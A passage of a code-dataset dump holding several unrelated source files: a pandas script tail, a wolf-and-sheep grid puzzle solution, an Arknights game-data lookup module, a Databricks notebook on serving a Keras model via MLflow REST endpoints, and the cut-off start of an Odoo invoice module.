df.loc[df['the_straw'] >= 0]\n dff.to_csv(\"comp_f.csv\",mode=\"a\",index=False,header=False)\n dfc.to_csv(\"comp_c.csv\",mode=\"a\",index=False,header=False)\n dfs.to_csv(\"comp_s.csv\",mode=\"a\",index=False,header=False)\n finally:\n f_out.close()\n c_out.close()\n s_out.close()\n\n","sub_path":"scripts/data_comp.py","file_name":"data_comp.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"90939252","text":"import sys\r\nfrom sys import stdin\r\nsys.setrecursionlimit(10000)\r\ninput = stdin.readline\r\n\r\n\r\ndef solution1():\r\n R, C = map(int, input().split())\r\n dx, dy = [1, 0, -1, 0], [0, 1, 0, -1]\r\n\r\n farm = [list(map(str, input().strip())) for _ in range(R)]\r\n\r\n doom = False\r\n\r\n for row in range(R):\r\n for col in range(C):\r\n if farm[row][col] == \"W\":\r\n for i in range(4):\r\n new_x, new_y = row + dx[i], col + dy[i]\r\n if new_x < 0 or new_y < 0 or new_x == R or new_y == C:\r\n continue\r\n if farm[new_x][new_y] == \"S\":\r\n doom = True\r\n elif farm[new_x][new_y] == \".\":\r\n farm[new_x][new_y] = \"D\"\r\n\r\n\r\n if doom:\r\n print(0)\r\n else:\r\n print(1)\r\n for i in farm:\r\n print(\"\".join(i))\r\n\r\n\r\ndef solution2():\r\n R, C = map(int, input().split())\r\n dx, dy = [1, 0, -1, 0], [0, 1, 0, -1]\r\n\r\n farm = [list(map(str, input().strip())) for _ in range(R)]\r\n\r\n doom = False\r\n\r\n for row in range(R):\r\n for col in range(C):\r\n if farm[row][col] == \"W\":\r\n for w in range(4):\r\n new_row, new_col = row + dx[w], col + dy[w]\r\n if new_row < 0 or new_row == R or new_col < 0 or new_col == C:\r\n continue\r\n if farm[new_row][new_col] == \"S\":\r\n doom = True\r\n\r\n if doom:\r\n print(0)\r\n else:\r\n print(1)\r\n for i in range(R):\r\n for j in range(C):\r\n if farm[i][j] not in 'SW':\r\n farm[i][j] = 'D'\r\n \r\n for i in farm:\r\n print(''.join(i))\r\n \r\n\r\nif __name__ == '__main__': \r\n # solution1()\r\n solution2()\r\n ","sub_path":"백준/Silver/16956. 늑대와 양/늑대와 양.py","file_name":"늑대와 양.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"242358805","text":"\"\"\"\r\nArknights data parsing\r\nReturn logic for every function: Get the value with highest Levenshtein Distance between input and name, ID (or code, appellation)\r\n\"\"\"\r\n\r\nimport json\r\nimport logging\r\nimport random\r\nfrom typing import List, Optional, Tuple\r\n\r\nimport requests\r\n# Fuzzy String Matching\r\nfrom fuzzywuzzy.fuzz import ratio\r\n\r\nfrom amiya.utils import constants\r\n\r\nlocale = 'en-US'\r\n\r\n\r\ndef fetch(url: str) -> dict:\r\n \"\"\"\r\n Grabs json data from Github link\r\n\r\n Args:\r\n url (str): Github raw file url\r\n\r\n Returns:\r\n dict: A json that contains the results\r\n \"\"\"\r\n\r\n # Using requests to fetch data\r\n data = requests.get(url)\r\n\r\n # If an error occurred during fetching\r\n if data.status_code != 200:\r\n logging.error(\"Fetching failed\")\r\n return None\r\n\r\n # Parses data to json (dict)\r\n data = data.json()\r\n return data\r\n\r\n\r\noperator_table = None\r\n\r\n\r\ndef get_operator_info(operator: str) -> dict:\r\n \"\"\"\r\n Grabs operator detailed info (search by name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n dict: A json that contains the operator info with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n global operator_table\r\n # Check if operator_table is already loaded and load it from local file\r\n if operator_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/character_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n operator_table = json.load(f)\r\n\r\n return max(\r\n list(operator_table.items()),\r\n key=lambda x: max(\r\n # Match ID\r\n ratio(x[0], operator),\r\n # Match name\r\n ratio(x[1][\"name\"], operator),\r\n # Match appellation\r\n ratio(x[1][\"appellation\"] or \"\", operator),\r\n ),\r\n )\r\n\r\n\r\nhandbook_info_table = None\r\n\r\n\r\ndef get_operator_file(operator: str) -> Tuple[str, dict]:\r\n \"\"\"\r\n Grabs operator's detailed file (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n Tuple[str, dict]: A tuple contains a str denote the operator's name and dict that contains the operator profile with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get operator id\r\n char_id = info[0]\r\n\r\n # Check if handbook_info_table is already loaded and load it from local file\r\n global handbook_info_table\r\n if handbook_info_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/handbook_info_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n handbook_info_table = json.load(f)\r\n\r\n # Get operator profile\r\n return (info[1][\"name\"], handbook_info_table[\"handbookDict\"][char_id])\r\n\r\n\r\ncharword_table = None\r\n\r\n\r\ndef get_operator_audio(operator: str) -> Tuple[str, List[dict]]:\r\n \"\"\"\r\n Grabs operator's voice records (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n Tuple[str, List[dict]]: A tuple contains a str denote the operator's name and a list of dict that contains the operator's audio records with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get default skin ID\r\n char_id = info[0]\r\n\r\n # Check if charword_table is already loaded and load it from local file\r\n global charword_table\r\n if charword_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/charword_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n charword_table = json.load(f)\r\n\r\n # Get voice records\r\n return (info[1][\"name\"], sorted([voice for voice in charword_table.values() if voice[\"charId\"] == char_id], key=lambda voice: voice[\"voiceIndex\"]))\r\n\r\n\r\nskin_table = None\r\n\r\n\r\ndef get_operator_skins(operator: str) -> List[dict]:\r\n \"\"\"\r\n Grabs operator's skins detailed infos (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n List[dict]: A list of dict that contains the operator's skins with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get operator ID\r\n char_id = info[0]\r\n\r\n # Check if skin_table is already loaded and load it from local file\r\n global skin_table\r\n if skin_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/skin_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n skin_table = json.load(f)\r\n\r\n # Get list of operator skins mapped by skin ID\r\n skin_list = skin_table[\"charSkins\"]\r\n return [skin for skin in skin_list.values() if skin[\"charId\"] == char_id]\r\n\r\n\r\nskill_table = None\r\n\r\n\r\ndef get_operator_skills(operator: str) -> List[dict]:\r\n \"\"\"\r\n Grabs operator skills detailed infos (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n List[dict]: A list of tuple (skill from character_table, skill from skill_table) that contains the operator skills with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get operator skills\r\n skills = info[1][\"skills\"]\r\n\r\n # Check if skill_table is already loaded and load it from local file\r\n global skill_table\r\n if skill_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/skill_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n skill_table = json.load(f)\r\n\r\n # Return a list of tuple with skill info from operator_table and skill_table\r\n # As for why, the skill data from 2 tables are different but both useful\r\n return [(skill, skill_table[skill[\"skillId\"]]) for skill in skills]\r\n\r\n\r\nhidden_table = None\r\n\r\n\r\ndef get_operator_by_tags(tags: list) -> List[dict]:\r\n \"\"\"\r\n Grabs operators that contains given tags\r\n\r\n Args:\r\n tags (list): The input tags list (input must be correct)\r\n\r\n Returns:\r\n List[dict]: A list of dict that contains operator's name, position (Ranged or Melee), tag list. rarity and profession\r\n \"\"\"\r\n\r\n url = \"https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/json/akhr.json\"\r\n # Check if operator_table and hidden_table is already loaded and load it\r\n # from local file or fetch it\r\n global operator_table, hidden_table\r\n if operator_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/character_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n operator_table = json.load(f)\r\n if hidden_table is None:\r\n hidden_table = fetch(url)\r\n\r\n # As the operator_table doesn't actually show which operator we can't get from recruitment, we need Aceship's akhr file to check\r\n # Even though in character_table.json there's a key named\r\n # \"itemOptainApproach\", I don't use it to check because it's faulty (?) as\r\n # Indra is supposed to be a Recruitment only operator but it shows\r\n # \"Recruitment & Headhunting\" in her \"itemOptainApproach\"\r\n hidden_list = [{x[\"name\"]: x[\"hidden\"]} for x in hidden_table]\r\n\r\n # The actual work\r\n operator_list = [\r\n # Grabbing only what we need\r\n {key: x[key]\r\n for key in [\"name\", \"position\", \"tagList\", \"rarity\", \"profession\"]}\r\n for x in operator_table.values()\r\n if (\r\n (\r\n # Check for common tags\r\n x[\"tagList\"] is not None\r\n and (set([i.lower() for i in x[\"tagList\"]]) & set(tags))\r\n )\r\n # Check for position\r\n or x[\"position\"].lower() in tags\r\n # Check for profession\r\n or constants.PROFESSION_TABLE[x[\"profession\"]].lower() in tags\r\n # Check for Senior or Top Operator by rarity (0-indexed)\r\n or (\"senior operator\" in tags and x[\"rarity\"] == 4)\r\n or (\"top operator\" in tags and x[\"rarity\"] == 5)\r\n )\r\n # If operator is not in hidden_list, that means we can obtain through\r\n # Recruitment\r\n and {x[\"name\"]: False} in hidden_list\r\n ]\r\n\r\n # Append the remaining tags as the tagList doesn't contain position,\r\n # profession or rarity\r\n for operator in operator_list:\r\n operator[\"tagList\"].append(operator.pop(\"position\", None).title())\r\n operator[\"tagList\"].append(\r\n constants.PROFESSION_TABLE[operator.pop(\r\n \"profession\", None)].title()\r\n )\r\n if operator[\"rarity\"] == 4:\r\n operator[\"tagList\"].append(\"Senior Operator\")\r\n if operator[\"rarity\"] == 5:\r\n operator[\"tagList\"].append(\"Top Operator\")\r\n\r\n return operator_list\r\n\r\n\r\nitem_table = None\r\n\r\n\r\ndef get_item(item: str) -> dict:\r\n \"\"\"\r\n Grabs detailed item info (search by name or ID)\r\n\r\n Args:\r\n item (str): Item name or ID\r\n\r\n Returns:\r\n dict: A dict that contains item info with name or ID that matches the parameter\r\n \"\"\"\r\n\r\n # Check if item_table is already loaded and load it from local file\r\n global item_table\r\n if item_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/item_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n item_table = json.load(f)\r\n\r\n # Get item list from table\r\n item_list = item_table[\"items\"]\r\n return max(\r\n list(item_list.values()),\r\n # Match name or ID\r\n key=lambda x: max(ratio(x[\"name\"], item), ratio(x[\"itemId\"], item)),\r\n )\r\n\r\n\r\nstage_table = None\r\n\r\n\r\ndef get_stage(stage: str) -> Tuple[dict, dict, Optional[dict]]:\r\n \"\"\"\r\n Grabs detailed stage info (search by name, code or ID)\r\n\r\n Args:\r\n stage (str): stage (str): Stage name, code or ID\r\n\r\n Returns:\r\n Tuple[dict, dict, Optional[dict]]: A tuple of dict that contains stage info with name, code or ID that matches the parameter. \r\n Last variable is a dict if stage is annihilation\r\n \"\"\"\r\n\r\n # Check if stage_table is already loaded and load it from local file\r\n global stage_table\r\n if stage_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/stage_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n stage_table = json.load(f)\r\n\r\n # Get stage list\r\n stage_list = stage_table[\"stages\"]\r\n\r\n stage_info = max(\r\n list(stage_list.values()),\r\n key=lambda x: max(\r\n # Match ID\r\n ratio(x[\"stageId\"], stage),\r\n # Match code\r\n ratio(x[\"code\"], stage),\r\n # Match name\r\n ratio(x[\"name\"] or \"\", stage),\r\n ),\r\n )\r\n\r\n # Additional info\r\n stage_extra_info = None\r\n with open(f'ArknightsData/{locale}/gamedata/levels/{stage_info[\"levelId\"].lower()}.json', \"r\", encoding=\"UTF-8\") as f:\r\n stage_extra_info = json.load(f)\r\n\r\n # Annihilatio\r\n anni_info = None\r\n if stage_info[\"stageType\"] == \"CAMPAIGN\":\r\n anni_info = stage_table[\"campaigns\"][stage_info[\"stageId\"]]\r\n\r\n return (stage_info, stage_extra_info, anni_info)\r\n\r\n\r\ndef get_stage_with_item(id: str) -> List[dict]:\r\n \"\"\"\r\n Grabs stages that drops item with id\r\n\r\n Args:\r\n id (str): Item ID (input must be correct)\r\n\r\n Returns:\r\n List[dict]: A list that contains tuple (stage that drop item with ID, probability of item dropping)\r\n \"\"\"\r\n\r\n # Check if stage_table is already loaded and load it from local file\r\n global stage_table\r\n if stage_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/stage_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n stage_table = json.load(f)\r\n\r\n # Get stage list\r\n stage_list = stage_table[\"stages\"]\r\n\r\n def get_index(lst: list) -> Optional[int]:\r\n \"\"\"\r\n Get index of item that has the same ID with given ID in item drop list of stage\r\n Returns None if item is not in list\r\n \"\"\"\r\n return next((idx for (idx, dt) in enumerate(\r\n lst) if dt[\"id\"] == id), None)\r\n\r\n return [\r\n (\r\n # Stage info\r\n x,\r\n # Item drop type (Probability of dropping)\r\n # I'm sure there are better ways to do this but i'm a noob\r\n x[\"stageDropInfo\"][\"displayDetailRewards\"][\r\n get_index(x[\"stageDropInfo\"][\"displayDetailRewards\"])\r\n ][\"dropType\"],\r\n )\r\n for x in list(stage_list.values())\r\n # Check if item is in list\r\n if get_index(x[\"stageDropInfo\"][\"displayDetailRewards\"]) is not None\r\n ]\r\n\r\n\r\nbuilding_data = None\r\n\r\n\r\ndef get_furniture(furniture: str) -> dict:\r\n \"\"\"\r\n Grabs detailed furniture info (search by name or ID)\r\n\r\n Args:\r\n furniture (str): Furniture name or ID\r\n\r\n Returns:\r\n dict: A dict that contains furniture info with name or ID that matches the parameter\r\n \"\"\"\r\n\r\n # Check if building_data is already loaded and load it from local file\r\n global building_data\r\n if building_data is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/building_data.json\", \"r\", encoding=\"UTF-8\") as f:\r\n building_data = json.load(f)\r\n\r\n # Get furniture list\r\n furniture_list = building_data[\"customData\"][\"furnitures\"]\r\n return max(\r\n list(furniture_list.values()),\r\n # Match name or ID\r\n key=lambda x: max(ratio(x[\"name\"], furniture),\r\n ratio(x[\"id\"], furniture)),\r\n )\r\n\r\n\r\nenemy_handbook_table = None\r\n\r\n\r\ndef get_enemy(enemy: str) -> dict:\r\n \"\"\"\r\n Grabs detailed enemy info (search by name or ID)\r\n\r\n Args:\r\n enemy (str): Enemy name or ID\r\n\r\n Returns:\r\n dict: A dict that contains enemy info with name or ID that matches the parameter\r\n \"\"\"\r\n\r\n # Check if enemy_handbook_table is already loaded and load it from local\r\n # file\r\n global enemy_handbook_table\r\n if enemy_handbook_table is None:\r\n with open(\r\n f\"ArknightsData/{locale}/gamedata/excel/enemy_handbook_table.json\", \"r\"\r\n ) as f:\r\n enemy_handbook_table = json.load(f)\r\n\r\n return max(\r\n list(enemy_handbook_table.values()),\r\n # Match name or ID\r\n key=lambda x: max(ratio(x[\"name\"], enemy), ratio(x[\"enemyId\"], enemy)),\r\n )\r\n\r\n\r\ntip_table = None\r\n\r\n\r\ndef get_tips(category: str) -> dict:\r\n \"\"\"\r\n Grabs a random tip (with or without category)\r\n\r\n Args:\r\n category (str): Category of tip (optional) (must be correct)\r\n\r\n Returns:\r\n dict: A dict that contains tip about given category\r\n \"\"\"\r\n\r\n # Check if tip_table is already loaded and load it from local file\r\n global tip_table\r\n if tip_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/tip_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n tip_table = json.load(f)\r\n\r\n # Get tip list\r\n tip_list = tip_table[\"tips\"]\r\n\r\n # Random tip\r\n return random.choice(\r\n tip_list\r\n if category is None\r\n else [x for x in tip_list if x[\"category\"] == category.upper()]\r\n )\r\n","sub_path":"amiya/utils/arknights.py","file_name":"arknights.py","file_ext":"py","file_size_in_byte":15261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"59240944","text":"# Databricks notebook source\n# MAGIC \n# MAGIC %md-sandbox\n# MAGIC \n# MAGIC
\n# MAGIC \"Databricks\n# MAGIC
\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Model Serving\n# MAGIC \n# MAGIC There are many deployment options for machine learning models. This notebook explores a more complex deployment scenario involving the real time deployment of a convolutional neural network using REST and Databricks MLflow Model Serving.\n# MAGIC \n# MAGIC ## ![Spark Logo Tiny](https://files.training.databricks.com/images/105/logo_spark_tiny.png) In this lesson you:
\n# MAGIC - Create a `pyfunc` to serve a `keras` model with pre and post processing logic\n# MAGIC - Save the `pyfunc` for downstream consumption \n# MAGIC - Serve the model using a REST endpoint\n\n# COMMAND ----------\n\n# MAGIC %run \"./Includes/Classroom-Setup\"\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Model Serving in Databricks\n# MAGIC \n# MAGIC The MLflow model registry in Databricks is now integrated with MLflow Model Serving. This is currently intended for development use cases and is therefore not intended for production. In this module, you will create a wrapper class around a `keras` model that provides custom pre and post processing logic necessary for this more complex deployment scenario. \n# MAGIC \n# MAGIC For additional background, see the following resources:\n# MAGIC \n# MAGIC - [Databricks blog on model serving](https://databricks.com/blog/2020/06/25/announcing-mlflow-model-serving-on-databricks.html)\n# MAGIC - [Example of an image classifier](https://github.com/mlflow/mlflow/tree/master/examples/flower_classifier)\n# MAGIC - [Example of a custom loader used with XGBoost](https://www.mlflow.org/docs/latest/models.html#example-saving-an-xgboost-model-in-mlflow-format)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Creating a Wrapper Class using `pyfunc`\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a `keras` model using a reference architecture and pretrained weights.\n\n# COMMAND ----------\n\nimport tensorflow as tf\n\ntf.random.set_seed(42)\n\ndef get_model():\n img_height = 224\n img_width = 224\n\n return tf.keras.applications.VGG16(weights=\"imagenet\", input_shape=(img_height, img_width, 3))\n \nmodel = get_model()\n\nmodel.summary()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a small dataset to test the model. This is two images of cats.\n\n# COMMAND ----------\n\nimport pandas as pd\nimport base64\n\nfilenames = [\"/dbfs/mnt/training/dl/img/cats/cats2.jpg\", \"/dbfs/mnt/training/dl/img/cats/cats4.jpg\"]\n\ndef read_image(path: str) -> bytes:\n ''' Reads an image from a path and returns the contents in bytes '''\n with open(path, \"rb\") as f:\n image_bytes = f.read()\n return image_bytes\n\ndata = pd.DataFrame(data=[base64.encodebytes(read_image(x)) for x in filenames], columns=[\"image\"])\ndata\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Save the model using `mlflow`.\n\n# COMMAND ----------\n\nimport mlflow\nimport mlflow.keras\nimport uuid\n\nmodel_name = f\"keras_model_{uuid.uuid4().hex[:10]}\"\n\nwith mlflow.start_run() as run:\n mlflow.keras.log_model(artifact_path=model_name, keras_model=model)\n \n model_uri = f\"runs:/{run.info.run_id}/{model_name}\"\n \nprint(f\"Model saved to {model_uri}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a wrapper class that includes the following as a `pyfunc`:\n# MAGIC \n# MAGIC - A `load_context` method to load in the model. Note this is necessary because you cannot serialize a `keras` model directly using `cloudpickle`, so we need to load the model in a different way.\n# MAGIC - Custom featurization logic that parses base64 encoded images (necessary for HTTP requests)\n# MAGIC - Custom prediction logic that reports the top class and its probability\n\n# COMMAND ----------\n\nimport mlflow\n\nclass KerasImageClassifierPyfunc(mlflow.pyfunc.PythonModel):\n \n def __init__(self):\n self.model = None\n self.img_height = 224\n self.img_width = 224\n \n def load_context(self, context=None, path=None):\n '''\n When loading a pyfunc, this method runs automatically with the related\n context. This method is designed to load the keras model from a path \n if it is running in a notebook or use the artifact from the context\n if it is loaded with mlflow.pyfunc.load_model()\n '''\n import numpy as np\n import tensorflow as tf\n \n if context: # This block executes for server run\n model_path = context.artifacts[\"keras_model\"]\n else: # This block executes for notebook run\n model_path = path\n \n self.model = mlflow.keras.load_model(model_path)\n \n def predict_from_bytes(self, image_bytes):\n '''\n Applied across numpy representations of the model input, this method\n uses the appropriate decoding based upon whether it is run in the \n notebook or on a server\n '''\n import base64\n \n try: # This block executes for notebook run\n image_bytes_decoded = base64.decodebytes(image_bytes)\n img_array = tf.image.decode_image(image_bytes_decoded)\n except: # This block executes for server run\n img_array = tf.image.decode_image(image_bytes) \n \n img_array = tf.image.resize(img_array, (self.img_height, self.img_width))\n img_array = tf.expand_dims(img_array, 0)\n prediction = self.model.predict(img_array)\n return prediction[0]\n \n def postprocess_raw_predictions(self, raw_prediction):\n '''\n Post processing logic to render predictions in a human readable form\n '''\n from tensorflow.keras.applications.vgg16 import decode_predictions\n \n res = decode_predictions(raw_prediction, top=3)\n str_template = \"Best response of {best} with probability of {p}\"\n return [str_template.format(best=i[0][1], p=i[0][2]) for i in res]\n\n def predict(self, context=None, model_input=None):\n '''\n Wrapper predict method\n '''\n n_records = model_input.shape[0]\n \n input_numpy = model_input.values\n raw_predictions = np.vectorize(self.predict_from_bytes, otypes=[np.ndarray])(input_numpy)\n raw_predictions = np.array(raw_predictions.tolist()).reshape([n_records, 1000])\n \n decoded_predictions = self.postprocess_raw_predictions(raw_predictions)\n decoded_predictions = pd.DataFrame(decoded_predictions, columns=[\"prediction\"])\n decoded_predictions.index = model_input.index\n return decoded_predictions\n\nclassifier_pyfunc = KerasImageClassifierPyfunc()\nclassifier_pyfunc.load_context(path=model_uri) # This will run automatically when using mlflow.pyfunc.load_model()\n\noutput = classifier_pyfunc.predict(model_input=data)\noutput\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Toilet tissue? Take a look at the images to see why the model predicted these classes. Note the confidence of the prediction.\n\n# COMMAND ----------\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimg = mpimg.imread(filenames[0]) # The \"toilet tissue\"\nplt.imshow(img)\n\n# COMMAND ----------\n\nimg = mpimg.imread(filenames[1]) # The \"tabby\"\nplt.imshow(img)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Save the `pyfunc` with Dependencies\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create a model signature to document model inputs and outputs.\n\n# COMMAND ----------\n\nfrom mlflow.models.signature import infer_signature\n\nsignature = infer_signature(data, output)\n\nsignature\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create the Conda environment for all the `pyfunc`'s dependencies.\n\n# COMMAND ----------\n\nimport cloudpickle\nimport tensorflow.keras\nfrom sys import version_info\nimport tensorflow as tf\n\nconda_env = {\n \"channels\": [\"defaults\"],\n \"dependencies\": [\n f\"python={version_info.major}.{version_info.minor}.{version_info.micro}\",\n \"pip\",\n {\"pip\": [\n \"mlflow\",\n f\"tensorflow=={tf.__version__}\",\n f\"cloudpickle==1.2.2\", # Forcing cloudpickle version due to serialization issue\n f\"keras=={tensorflow.keras.__version__}\" # Need both tensorflow and keras due to mlflow dependency\n ],\n },\n ],\n \"name\": \"keras_env\"\n}\n\nconda_env\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Create associated artifacts. Note that we cannot serialize `keras` models using the default `cloudpickle` so we'll instead read in the model using `keras` when the Python function is loaded.\n\n# COMMAND ----------\n\nartifacts = {\n \"keras_model\": model_uri\n}\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Log the `pyfunc` including the artifacts, environment, signature, and input example.\n\n# COMMAND ----------\n\nmlflow_pyfunc_model_path = f\"{userhome}/{model_name}\"\n\nmlflow.pyfunc.save_model(\n path=mlflow_pyfunc_model_path, \n python_model=KerasImageClassifierPyfunc(), \n artifacts=artifacts,\n conda_env=conda_env,\n signature=signature,\n input_example=data\n)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Load the model back in and test on a sample of the data.\n\n# COMMAND ----------\n\nloaded_model = mlflow.pyfunc.load_model(mlflow_pyfunc_model_path)\nloaded_model.predict(data)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Log to the Model Registry and Serve using REST\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Log to the model registry.\n\n# COMMAND ----------\n\nmlflow.register_model(model_uri=mlflow_pyfunc_model_path.replace(\"/dbfs\", \"dbfs:\"), name=model_name)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Load from the model registry to confirm the registration is complete.\n\n# COMMAND ----------\n\nimport time\n\nmodel_version_uri = f\"models:/{model_name}/1\"\n\nwhile True:\n try:\n model_version_1 = mlflow.pyfunc.load_model(model_version_uri)\n break\n except:\n print(f\"Model not ready yet. Sleeping...\")\n time.sleep(10)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Enable cluster serving. **This will create a dedicated VM to serve this model** so be sure to shut it down when you're done.\n\n# COMMAND ----------\n\nimport requests\n\ntoken = dbutils.notebook.entry_point.getDbutils().notebook().getContext().apiToken().getOrElse(None)\ninstance = dbutils.notebook.entry_point.getDbutils().notebook().getContext().tags().apply('browserHostName')\nheaders = {'Authorization': f'Bearer {token}'}\nurl = f'https://{instance}/api/2.0/mlflow/endpoints/enable'\n\nr = requests.post(url, headers=headers, json={\"registered_model_name\": model_name})\nr.status_code\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Get cluster serving status. This will wait until the endpoint is ready.\n\n# COMMAND ----------\n\nurl = f'https://{instance}/api/2.0/mlflow/endpoints/get-status'\n\nwhile True:\n r = requests.get(url, headers=headers, json={\"registered_model_name\": model_name})\n if r.json().get(\"endpoint_status\")['state'] != \"ENDPOINT_STATE_READY\":\n print(f\"Endpoint not ready yet. Sleeping...\")\n time.sleep(10)\n else:\n print(f\"Endpoint READY\")\n break\n\nr.json()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Score using the REST endpoint and wait until it's ready.\n# MAGIC \n# MAGIC **Note:** this code could fail if the Conda environment is not fully running yet. Retry if you receive a 404 error.\n\n# COMMAND ----------\n\nimport os\nimport pandas as pd\n\ndef score_model(data: pd.DataFrame, model_name: str):\n token = dbutils.notebook.entry_point.getDbutils().notebook().getContext().apiToken().getOrElse(None)\n instance = dbutils.notebook.entry_point.getDbutils().notebook().getContext().tags().apply('browserHostName')\n url = f'https://{instance}/model/{model_name}/1/invocations'\n headers = {'Authorization': f'Bearer {token}'}\n data_json = data.to_dict(orient='split')\n response = requests.request(method='POST', headers=headers, url=url, json=data_json)\n if response.status_code != 200:\n raise Exception(f'Request failed with status {response.status_code}, {response.text}')\n return response.json()\n\nwhile True:\n try:\n print(score_model(data, model_name))\n break\n except:\n print(f\"Conda environment still building. Sleeping...\")\n time.sleep(10)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Confirm the endpoint is running.\n\n# COMMAND ----------\n\nscore_model(data, model_name)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Disable cluster serving. **This will shut down the model serving endpoint.**\n\n# COMMAND ----------\n\nurl = f'https://{instance}/api/2.0/mlflow/endpoints/disable'\nrequests.post(url, headers=headers, json={\"registered_model_name\": model_name})\n\n\n# COMMAND ----------\n\n# MAGIC %md-sandbox\n# MAGIC © 2021 Databricks, Inc. All rights reserved.
\n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
\n# MAGIC
\n# MAGIC Privacy Policy | Terms of Use | Support","sub_path":"4. useful_code/Data + AI Summit 2021/Scaling Deep Learning with TensorFlow and Apache Spark/Python/DL 09b - Model Serving.py","file_name":"DL 09b - Model Serving.py","file_ext":"py","file_size_in_byte":12847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391280696","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Haresh Kansara\n# Copyright (C) 2020-TODAY Haresh Kansara(hareshkansara00@gmail.com).\n# Author: Haresh Kansara(hareshkansara00@gmail.com).\n# you can modify it under the terms of the GNU LESSER\n# GENERAL PUBLIC LICENSE (LGPL v3), Version 3.\n#\n# It is forbidden to publish, distribute, sublicense, or sell copies\n# of the Software or modified copies of the Software.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU LESSER GENERAL PUBLIC LICENSE (LGPL v3) for more details.\n#\n# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE\n# GENERAL PUBLIC LICENSE (LGPL v3) along with this program.\n# If not, see .\n#\n##############################################################################\n\nfrom odoo.tools.misc import get_lang\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass SaleOrderTemplate(models.Model):\n\n _inherit = 'sale.order.template'\n\n is_printing_inv = fields.Boolean(string='Is Printing Template?')\n\n\nclass AccountMove(models.Model):\n\n _inherit = 'account.move'\n\n is_printing_inv = fields.Boolean(string='Is Printing Invoice?')\n\n def action_invoice_sent(self):\n \"\"\" Open a window to compose an email, with the edi invoice template\n message loaded by default\n \"\"\"\n self.ensure_one()\n template = 